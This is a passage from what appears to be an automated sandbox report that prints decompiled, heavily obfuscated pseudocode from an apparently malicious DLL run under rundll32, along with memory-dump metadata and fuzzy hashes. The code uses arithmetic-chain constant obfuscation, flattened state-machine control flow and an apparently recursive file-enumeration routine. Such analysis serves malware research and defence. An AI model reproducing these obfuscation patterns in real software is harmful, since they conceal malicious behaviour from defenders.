                                                                                                                      				_v116 = _v116 ^ 0xb72c0337;
                                                                                                                      				_v116 = _v116 ^ 0xb7828c59;
                                                                                                                      				_v28 = 0x7f34ff;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0xfe6bca43;
                                                                                                                      				_v124 = 0x9f58a2;
                                                                                                                      				_v124 = _v124 + 0xffff9c37;
                                                                                                                      				_v124 = _v124 + 0x725a;
                                                                                                                      				_v124 = _v124 << 7;
                                                                                                                      				_v124 = _v124 ^ 0x4fb1837f;
                                                                                                                      				_v52 = 0xa9f0c8;
                                                                                                                      				_v52 = _v52 + 0xfffffc3c;
                                                                                                                      				_v52 = _v52 ^ 0x00ad5534;
                                                                                                                      				_v24 = 0xa43c6e;
                                                                                                                      				_t383 = 0x6e;
                                                                                                                      				_v24 = _v24 * 0x5b;
                                                                                                                      				_v24 = _v24 ^ 0x3a644c1a;
                                                                                                                      				_v132 = 0x7fb628;
                                                                                                                      				_v132 = _v132 * 0xb;
                                                                                                                      				_v132 = _v132 << 6;
                                                                                                                      				_v132 = _v132 << 0xd;
                                                                                                                      				_v132 = _v132 ^ 0x9dcf3d61;
                                                                                                                      				_v100 = 0x597f63;
                                                                                                                      				_v100 = _v100 | 0xd4d51309;
                                                                                                                      				_v100 = _v100 << 9;
                                                                                                                      				_v100 = _v100 ^ 0xbafad16c;
                                                                                                                      				_v108 = 0x4d061a;
                                                                                                                      				_v108 = _v108 >> 2;
                                                                                                                      				_v108 = _v108 ^ 0xd197d397;
                                                                                                                      				_v108 = _v108 + 0xffff042d;
                                                                                                                      				_v108 = _v108 ^ 0xd1833bae;
                                                                                                                      				_v20 = 0x2586e5;
                                                                                                                      				_v20 = _v20 + 0x8581;
                                                                                                                      				_v20 = _v20 ^ 0x0026b83c;
                                                                                                                      				_v92 = 0x3ae4f5;
                                                                                                                      				_v92 = _v92 << 1;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 ^ 0xae4bd9c6;
                                                                                                                      				_v44 = 0xe6dc30;
                                                                                                                      				_v44 = _v44 ^ 0xd3982ed3;
                                                                                                                      				_v44 = _v44 ^ 0xd37e8c85;
                                                                                                                      				_v144 = 0xe42628;
                                                                                                                      				_v144 = _v144 | 0xc37700ac;
                                                                                                                      				_v144 = _v144 >> 0xa;
                                                                                                                      				_v144 = _v144 << 0xc;
                                                                                                                      				_v144 = _v144 ^ 0x0fd23fe2;
                                                                                                                      				_v152 = 0x41402a;
                                                                                                                      				_t186 =  &_v152; // 0x41402a
                                                                                                                      				_t384 = 0x19;
                                                                                                                      				_v152 =  *_t186 / _t383;
                                                                                                                      				_v152 = _v152 * 0x6a;
                                                                                                                      				_v152 = _v152 ^ 0x2485591b;
                                                                                                                      				_v152 = _v152 ^ 0x24bff8d4;
                                                                                                                      				_v160 = 0xbf0758;
                                                                                                                      				_v160 = _v160 + 0x522b;
                                                                                                                      				_v160 = _v160 >> 0xe;
                                                                                                                      				_v160 = _v160 + 0xffff65d4;
                                                                                                                      				_v160 = _v160 ^ 0xfff1feea;
                                                                                                                      				_v84 = 0x1a9ecc;
                                                                                                                      				_v84 = _v84 << 0x10;
                                                                                                                      				_t385 = 0x2d;
                                                                                                                      				_v84 = _v84 / _t384;
                                                                                                                      				_v84 = _v84 ^ 0x065118ef;
                                                                                                                      				_v120 = 0x6a6625;
                                                                                                                      				_t219 =  &_v120; // 0x6a6625
                                                                                                                      				_v120 =  *_t219 / _t385;
                                                                                                                      				_v120 = _v120 >> 0xd;
                                                                                                                      				_v120 = _v120 + 0x1650;
                                                                                                                      				_v120 = _v120 ^ 0x00013394;
                                                                                                                      				_v76 = 0x6cd503;
                                                                                                                      				_v76 = _v76 + 0xffff64c6;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x09bb62c3;
                                                                                                                      				_v128 = 0x4363ee;
                                                                                                                      				_v128 = _v128 | 0x70162fad;
                                                                                                                      				_v128 = _v128 * 0x15;
                                                                                                                      				_v128 = _v128 + 0xffff87d6;
                                                                                                                      				_v128 = _v128 ^ 0x372e6b7a;
                                                                                                                      				_v36 = 0xd9ddf9;
                                                                                                                      				_v36 = _v36 << 5;
                                                                                                                      				_v36 = _v36 ^ 0x1b34c995;
                                                                                                                      				_v136 = 0xc7126f;
                                                                                                                      				_v136 = _v136 << 3;
                                                                                                                      				_v136 = _v136 >> 6;
                                                                                                                      				_v136 = _v136 + 0x2e5f;
                                                                                                                      				_v136 = _v136 ^ 0x001d82e9;
                                                                                                                      				_v104 = 0x7714f2;
                                                                                                                      				_v104 = _v104 << 2;
                                                                                                                      				_v104 = _v104 * 5;
                                                                                                                      				_t358 = 0x5786d8d;
                                                                                                                      				_v104 = _v104 | 0x0a59959c;
                                                                                                                      				_v104 = _v104 ^ 0x0b5ace50;
                                                                                                                      				_v68 = 0x585054;
                                                                                                                      				_v68 = _v68 ^ 0x33c1c88e;
                                                                                                                      				_v68 = _v68 ^ 0x9bceaa07;
                                                                                                                      				_v68 = _v68 ^ 0xa855990f;
                                                                                                                      				_v56 = 0xa2136b;
                                                                                                                      				_v56 = _v56 + 0x4ebb;
                                                                                                                      				_v56 = _v56 ^ 0x00a98962;
                                                                                                                      				_v32 = 0x51a57b;
                                                                                                                      				_v32 = _v32 >> 0xe;
                                                                                                                      				_v32 = _v32 ^ 0x0002096e;
                                                                                                                      				_v48 = 0x9fd766;
                                                                                                                      				_v48 = _v48 | 0x00a10b6a;
                                                                                                                      				_v48 = _v48 ^ 0x00bfd9fa;
                                                                                                                      				do {
                                                                                                                      					while(_t375 != _t358) {
                                                                                                                      						if(_t375 == 0x79707ab) {
                                                                                                                      							_t375 = 0x7c4530c;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t375 == 0x7c4530c) {
                                                                                                                      								_push(_v156);
                                                                                                                      								_push(_v96);
                                                                                                                      								_push(0x2b1678);
                                                                                                                      								_t366 = E002BAB66(_v88, _v80, __eflags);
                                                                                                                      								_push(_v28);
                                                                                                                      								_push(_v116);
                                                                                                                      								_t302 =  &_v148; // 0x372e6b7a
                                                                                                                      								_push(0x2b1538);
                                                                                                                      								__eflags = E002C0EDA(E002BAB66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
                                                                                                                      								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
                                                                                                                      								E002BAE03(_v132, _v100, _v108, _t366);
                                                                                                                      								E002BAE03(_v20, _v92, _v44, _t367);
                                                                                                                      								_t426 = _v12;
                                                                                                                      								_t431 =  &(_t431[0xf]);
                                                                                                                      								L10:
                                                                                                                      								_t358 = 0x5786d8d;
                                                                                                                      								goto L11;
                                                                                                                      							} else {
                                                                                                                      								if(_t375 != 0xfc0b370) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									E002B7027(_v32, _v40, _v16, _v48);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t430;
                                                                                                                      					}
                                                                                                                      					_push(_v84);
                                                                                                                      					_push(_v160);
                                                                                                                      					_push(0x2b1588);
                                                                                                                      					_t359 = E002BAB66(_v144, _v152, __eflags);
                                                                                                                      					_t360 =  *0x2d5c9c; // 0x0
                                                                                                                      					__eflags = E002CF9E2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, _t359, _t360 + 8) - _v60;
                                                                                                                      					_t375 = 0xfc0b370;
                                                                                                                      					_t430 =  ==  ? 1 : _t430;
                                                                                                                      					E002BAE03(_v104, _v68, _v56, _t359);
                                                                                                                      					_t431 =  &(_t431[0xf]);
                                                                                                                      					goto L10;
                                                                                                                      					L11:
                                                                                                                      					__eflags = _t375 - 0xbb932f6;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L6;
                                                                                                                      			}



























































                                                                                                                      0x002cb150
                                                                                                                      0x002cb158
                                                                                                                      0x002cb160
                                                                                                                      0x002cb168
                                                                                                                      0x002cb170
                                                                                                                      0x002cb178
                                                                                                                      0x002cb180
                                                                                                                      0x002cb188
                                                                                                                      0x002cb190
                                                                                                                      0x002cb198
                                                                                                                      0x002cb1a3
                                                                                                                      0x002cb1ab
                                                                                                                      0x002cb1b6
                                                                                                                      0x002cb1c1
                                                                                                                      0x002cb1cc
                                                                                                                      0x002cb1d7
                                                                                                                      0x002cb1d7
                                                                                                                      0x002cb1e5
                                                                                                                      0x002cb2e7
                                                                                                                      0x00000000
                                                                                                                      0x002cb1eb
                                                                                                                      0x002cb1f1
                                                                                                                      0x002cb22f
                                                                                                                      0x002cb233
                                                                                                                      0x002cb23f
                                                                                                                      0x002cb244
                                                                                                                      0x002cb249
                                                                                                                      0x002cb252
                                                                                                                      0x002cb256
                                                                                                                      0x002cb25e
                                                                                                                      0x002cb29e
                                                                                                                      0x002cb2b5
                                                                                                                      0x002cb2b8
                                                                                                                      0x002cb2d3
                                                                                                                      0x002cb2d8
                                                                                                                      0x002cb2df
                                                                                                                      0x002cb37b
                                                                                                                      0x002cb37b
                                                                                                                      0x00000000
                                                                                                                      0x002cb1f3
                                                                                                                      0x002cb1f9
                                                                                                                      0x00000000
                                                                                                                      0x002cb1ff
                                                                                                                      0x002cb21b
                                                                                                                      0x002cb221
                                                                                                                      0x002cb1f9
                                                                                                                      0x002cb1f1
                                                                                                                      0x002cb224
                                                                                                                      0x002cb22e
                                                                                                                      0x002cb22e
                                                                                                                      0x002cb2f1
                                                                                                                      0x002cb2f5
                                                                                                                      0x002cb301
                                                                                                                      0x002cb306
                                                                                                                      0x002cb310
                                                                                                                      0x002cb356
                                                                                                                      0x002cb358
                                                                                                                      0x002cb365
                                                                                                                      0x002cb373
                                                                                                                      0x002cb378
                                                                                                                      0x00000000
                                                                                                                      0x002cb380
                                                                                                                      0x002cb380
                                                                                                                      0x002cb380
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      • Opcode ID: ffafc34598540c4f70bfa45f706d907a64265a59bb15ae6c8a768238174614f0
                                                                                                                      • Instruction ID: dda2a54233ba0ba7cdb01bd9ac1e3cfb68685142ac75fa4fec16d51d79c528d2
                                                                                                                      • Opcode Fuzzy Hash: ffafc34598540c4f70bfa45f706d907a64265a59bb15ae6c8a768238174614f0
                                                                                                                      • Instruction Fuzzy Hash: A0F11D715083809FD3A8CF25D48AA4BFBE2FBC0788F50891DF59A86260D7B19959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                      • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E002B1950(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				unsigned int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				intOrPtr _v156;
                                                                                                                      				char _v176;
                                                                                                                      				short _v720;
                                                                                                                      				short _v722;
                                                                                                                      				char _v724;
                                                                                                                      				signed int _v768;
                                                                                                                      				char _v1288;
                                                                                                                      				char _v1808;
                                                                                                                      				void* _t335;
                                                                                                                      				signed int _t360;
                                                                                                                      				signed int _t362;
                                                                                                                      				intOrPtr _t371;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int _t379;
                                                                                                                      				void* _t406;
                                                                                                                      				signed int _t418;
                                                                                                                      				signed int _t419;
                                                                                                                      				signed int _t420;
                                                                                                                      				signed int _t421;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				void* _t426;
                                                                                                                      				void* _t427;
                                                                                                                      
                                                                                                                      				_t371 = _a8;
                                                                                                                      				_push(_a20);
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_push(_a16);
                                                                                                                      					_push(_a12);
                                                                                                                      					_push(_t371);
                                                                                                                      					_push(_a4);
                                                                                                                      					_push(__edx);
                                                                                                                      					_push(__ecx);
                                                                                                                      					E002BCF25(_t335);
                                                                                                                      					_v16 = 0x6f572e;
                                                                                                                      				}
                                                                                                                      				_t427 = _t426 + 0x1c;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 + 0xd52f;
                                                                                                                      				_t373 = 0x80f983c;
                                                                                                                      				_v16 = _v16 ^ 0x3310f03a;
                                                                                                                      				_v16 = _v16 ^ 0x33101333;
                                                                                                                      				_v60 = 0xed71dd;
                                                                                                                      				_v60 = _v60 ^ 0x2497a453;
                                                                                                                      				_t418 = 0x26;
                                                                                                                      				_v60 = _v60 * 0x72;
                                                                                                                      				_v60 = _v60 ^ 0x3eb60fda;
                                                                                                                      				_v112 = 0xa5b0b2;
                                                                                                                      				_v112 = _v112 + 0x8954;
                                                                                                                      				_v112 = _v112 ^ 0x00ada628;
                                                                                                                      				_v108 = 0xe5587e;
                                                                                                                      				_v108 = _v108 << 9;
                                                                                                                      				_v108 = _v108 ^ 0xcab3bbf0;
                                                                                                                      				_v92 = 0x4845fb;
                                                                                                                      				_v92 = _v92 + 0x365f;
                                                                                                                      				_v92 = _v92 + 0xdd1a;
                                                                                                                      				_v92 = _v92 ^ 0x004e95c0;
                                                                                                                      				_v88 = 0xa51f24;
                                                                                                                      				_v88 = _v88 ^ 0x4dc3992d;
                                                                                                                      				_v88 = _v88 >> 9;
                                                                                                                      				_v88 = _v88 ^ 0x002183c7;
                                                                                                                      				_v28 = 0x92b1f2;
                                                                                                                      				_v28 = _v28 + 0xdb28;
                                                                                                                      				_v28 = _v28 ^ 0xc5c4fb2d;
                                                                                                                      				_v28 = _v28 + 0xffff07a3;
                                                                                                                      				_v28 = _v28 ^ 0xc5543e55;
                                                                                                                      				_v56 = 0x45fcf7;
                                                                                                                      				_v56 = _v56 ^ 0x18f8a820;
                                                                                                                      				_v56 = _v56 / _t418;
                                                                                                                      				_v56 = _v56 ^ 0x00a79737;
                                                                                                                      				_v72 = 0xd5567a;
                                                                                                                      				_v72 = _v72 ^ 0x96c46f64;
                                                                                                                      				_v72 = _v72 + 0x1123;
                                                                                                                      				_v72 = _v72 ^ 0x96131221;
                                                                                                                      				_v128 = 0xd7fcd2;
                                                                                                                      				_v128 = _v128 | 0x19fc7ba7;
                                                                                                                      				_v128 = _v128 ^ 0x19f2013f;
                                                                                                                      				_v36 = 0xb63dda;
                                                                                                                      				_v36 = _v36 | 0x57c3443c;
                                                                                                                      				_v36 = _v36 >> 0xf;
                                                                                                                      				_v36 = _v36 >> 2;
                                                                                                                      				_v36 = _v36 ^ 0x000375d9;
                                                                                                                      				_v120 = 0x9784e5;
                                                                                                                      				_v120 = _v120 ^ 0x5442b457;
                                                                                                                      				_v120 = _v120 ^ 0x54d2e3fe;
                                                                                                                      				_v152 = 0x86b47c;
                                                                                                                      				_v152 = _v152 | 0x1a648f0d;
                                                                                                                      				_v152 = _v152 ^ 0x1ae2f95e;
                                                                                                                      				_v104 = 0xe16033;
                                                                                                                      				_v104 = _v104 + 0xffff0503;
                                                                                                                      				_v104 = _v104 ^ 0x00e7872e;
                                                                                                                      				_v140 = 0x7ced29;
                                                                                                                      				_v140 = _v140 + 0x937a;
                                                                                                                      				_v140 = _v140 ^ 0x00718bd8;
                                                                                                                      				_v148 = 0xa848b7;
                                                                                                                      				_v148 = _v148 ^ 0xa8d47762;
                                                                                                                      				_v148 = _v148 ^ 0xa87b6210;
                                                                                                                      				_v124 = 0xc4055c;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 ^ 0x1882bddf;
                                                                                                                      				_v80 = 0x58e97;
                                                                                                                      				_t419 = 0x7c;
                                                                                                                      				_v80 = _v80 / _t419;
                                                                                                                      				_v80 = _v80 + 0xffff9366;
                                                                                                                      				_v80 = _v80 ^ 0xfffe01cd;
                                                                                                                      				_v48 = 0x77db93;
                                                                                                                      				_t420 = 0x3a;
                                                                                                                      				_v48 = _v48 / _t420;
                                                                                                                      				_v48 = _v48 + 0xffffa5b4;
                                                                                                                      				_v48 = _v48 >> 6;
                                                                                                                      				_v48 = _v48 ^ 0x00036e08;
                                                                                                                      				_v132 = 0x4854bc;
                                                                                                                      				_t421 = 0x4c;
                                                                                                                      				_v132 = _v132 * 0x24;
                                                                                                                      				_v132 = _v132 ^ 0x0a23127f;
                                                                                                                      				_v84 = 0x297997;
                                                                                                                      				_v84 = _v84 / _t421;
                                                                                                                      				_t422 = 0x45;
                                                                                                                      				_v84 = _v84 * 0x5e;
                                                                                                                      				_v84 = _v84 ^ 0x003e8360;
                                                                                                                      				_v24 = 0xba7a12;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_v24 = _v24 ^ 0x8e2fa782;
                                                                                                                      				_v24 = _v24 + 0xffffcaa3;
                                                                                                                      				_v24 = _v24 ^ 0xfad920cc;
                                                                                                                      				_v64 = 0xf87d94;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 >> 4;
                                                                                                                      				_v64 = _v64 ^ 0x0002c2de;
                                                                                                                      				_v68 = 0x627eea;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 | 0x4b478a8f;
                                                                                                                      				_v68 = _v68 ^ 0x4b4b50ae;
                                                                                                                      				_v32 = 0x4d9af3;
                                                                                                                      				_v32 = _v32 + 0xffff3fdf;
                                                                                                                      				_v32 = _v32 | 0x07023235;
                                                                                                                      				_v32 = _v32 ^ 0xa9cb8ace;
                                                                                                                      				_v32 = _v32 ^ 0xae825d6e;
                                                                                                                      				_v144 = 0x2c231c;
                                                                                                                      				_v144 = _v144 ^ 0x372f588c;
                                                                                                                      				_v144 = _v144 ^ 0x37050cc1;
                                                                                                                      				_v40 = 0xed36d5;
                                                                                                                      				_v40 = _v40 / _t422;
                                                                                                                      				_v40 = _v40 + 0xffff2e56;
                                                                                                                      				_v40 = _v40 * 0xd;
                                                                                                                      				_v40 = _v40 ^ 0x002f5a10;
                                                                                                                      				_v20 = 0xb226b9;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_v20 = _v20 ^ 0x7ec33512;
                                                                                                                      				_v20 = _v20 ^ 0x86eef9df;
                                                                                                                      				_v20 = _v20 ^ 0xee6f0a5e;
                                                                                                                      				_v76 = 0xa2d2;
                                                                                                                      				_v76 = _v76 + 0xffff2403;
                                                                                                                      				_v76 = _v76 + 0xffff5c56;
                                                                                                                      				_v76 = _v76 ^ 0xfff84be5;
                                                                                                                      				_v12 = 0x61529e;
                                                                                                                      				_v12 = _v12 + 0x826f;
                                                                                                                      				_v12 = _v12 | 0x315ab852;
                                                                                                                      				_v12 = _v12 >> 0xa;
                                                                                                                      				_v12 = _v12 ^ 0x0008d08d;
                                                                                                                      				_v136 = 0xbe89c0;
                                                                                                                      				_v136 = _v136 ^ 0x9f3b785a;
                                                                                                                      				_v136 = _v136 ^ 0x9f8a2ffd;
                                                                                                                      				_v116 = 0x9615af;
                                                                                                                      				_v116 = _v116 | 0x7dcb4113;
                                                                                                                      				_v116 = _v116 ^ 0x7dd5a359;
                                                                                                                      				_v100 = 0x787e8d;
                                                                                                                      				_t423 = 0xf;
                                                                                                                      				_v100 = _v100 * 0x78;
                                                                                                                      				_v100 = _v100 ^ 0x3874d75c;
                                                                                                                      				_v96 = 0xce992e;
                                                                                                                      				_v96 = _v96 << 9;
                                                                                                                      				_v96 = _v96 | 0x5045bce0;
                                                                                                                      				_v96 = _v96 ^ 0xdd755c45;
                                                                                                                      				_v52 = 0xe3c541;
                                                                                                                      				_t417 = _v100;
                                                                                                                      				_v52 = _v52 / _t423;
                                                                                                                      				_v52 = _v52 + 0xffff4fb9;
                                                                                                                      				_v52 = _v52 | 0x0dbfd8b3;
                                                                                                                      				_v52 = _v52 ^ 0x0db5e533;
                                                                                                                      				_v44 = 0xd3f0eb;
                                                                                                                      				_v44 = _v44 | 0x02fbd4da;
                                                                                                                      				_v44 = _v44 >> 6;
                                                                                                                      				_v44 = _v44 + 0xffffa89e;
                                                                                                                      				_v44 = _v44 ^ 0x000772a1;
                                                                                                                      				while(1) {
                                                                                                                      					L5:
                                                                                                                      					_t406 = 0x2e;
                                                                                                                      					L6:
                                                                                                                      					while(_t373 != 0xcf103a) {
                                                                                                                      						if(_t373 == 0x80f983c) {
                                                                                                                      							_v156 = _t371;
                                                                                                                      							_t373 = 0xcf103a;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t373 == 0x8bdeaee) {
                                                                                                                      							__eflags = _v768 & _v16;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t360 = _a16( &_v768,  &_v176);
                                                                                                                      								asm("sbb ecx, ecx");
                                                                                                                      								_t379 =  ~_t360 & 0x01058edd;
                                                                                                                      								L13:
                                                                                                                      								_t373 = _t379 + 0xe9f3001;
                                                                                                                      								while(1) {
                                                                                                                      									L5:
                                                                                                                      									_t406 = 0x2e;
                                                                                                                      									goto L6;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _v724 - _t406;
                                                                                                                      								if(_v724 != _t406) {
                                                                                                                      									L22:
                                                                                                                      									__eflags = _a4;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_push(_v48);
                                                                                                                      										_push(_v80);
                                                                                                                      										_push(0x2b1264);
                                                                                                                      										E002BE7CE(E002BAB66(_v148, _v124, __eflags), __eflags, _v132, _t371, _v148, _v84, _v24, _v64, _v68,  &_v724);
                                                                                                                      										_t310 =  &_a12; // 0xee6f0a5e
                                                                                                                      										E002B1950(_v32, _v144, __eflags, _a4,  &_v1808,  *_t310, _a16, _v40);
                                                                                                                      										_t427 = _t427 + 0x40;
                                                                                                                      										_t362 = E002BAE03(_v20, _v76, _v12, _t365);
                                                                                                                      										_t406 = 0x2e;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _v722;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										__eflags = _v722 - _t406;
                                                                                                                      										if(_v722 != _t406) {
                                                                                                                      											goto L22;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _v720;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												goto L22;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								_t373 = 0xfa4bede;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							L31:
                                                                                                                      						}
                                                                                                                      						if(_t373 != 0x8fff290) {
                                                                                                                      							if(_t373 == 0xe9f3001) {
                                                                                                                      								return E002C8C35(_v100, _t417, _v96, _v52, _v44);
                                                                                                                      							}
                                                                                                                      							if(_t373 != 0xfa4bede) {
                                                                                                                      								L27:
                                                                                                                      								__eflags = _t373 - 0x71f77cc;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									return _t362;
                                                                                                                      								}
                                                                                                                      								goto L31;
                                                                                                                      							} else {
                                                                                                                      								_t277 =  &_v768; // 0x15f5595f
                                                                                                                      								_t362 = E002CF7FC(_v136, _t417, _v116, _t277);
                                                                                                                      								asm("sbb ecx, ecx");
                                                                                                                      								_t379 =  ~_t362 & 0xfa1ebaed;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t362 = E002CBAEA( &_v1288, _v152,  &_v768, _v104, _v140);
                                                                                                                      						_t417 = _t362;
                                                                                                                      						_t427 = _t427 + 0xc;
                                                                                                                      						__eflags = _t362 - 0xffffffff;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							_t373 = 0x8bdeaee;
                                                                                                                      							goto L5;
                                                                                                                      						}
                                                                                                                      						return _t362;
                                                                                                                      						goto L31;
                                                                                                                      					}
                                                                                                                      					_push(_v92);
                                                                                                                      					_push(_v108);
                                                                                                                      					_push(0x2b12d4);
                                                                                                                      					E002B3BF8(_v28, __eflags, E002BAB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t371);
                                                                                                                      					E002BAE03(_v128, _v36, _v120, _t353);
                                                                                                                      					_t427 = _t427 + 0x28;
                                                                                                                      					_t373 = 0x8fff290;
                                                                                                                      					_t406 = 0x2e;
                                                                                                                      					goto L27;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-3792513126
                                                                                                                      • Opcode ID: fb18f241cbdc7af115ddc97b7703403f4d60a40a44f56704d98bce7697ecc702
                                                                                                                      • Instruction ID: 46a29d4667d784e65c041a1004a89847434f1e0e847a1c87588fad6dcd02b0d8
                                                                                                                      • Opcode Fuzzy Hash: fb18f241cbdc7af115ddc97b7703403f4d60a40a44f56704d98bce7697ecc702
                                                                                                                      • Instruction Fuzzy Hash: FD024371C1031DDBCF28CFA1C98A9EEBBB1FB04354F208199E516BA264C7B44AA5CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002C2753(intOrPtr* __ecx) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				intOrPtr _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				unsigned int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				intOrPtr* _v172;
                                                                                                                      				signed int _v176;
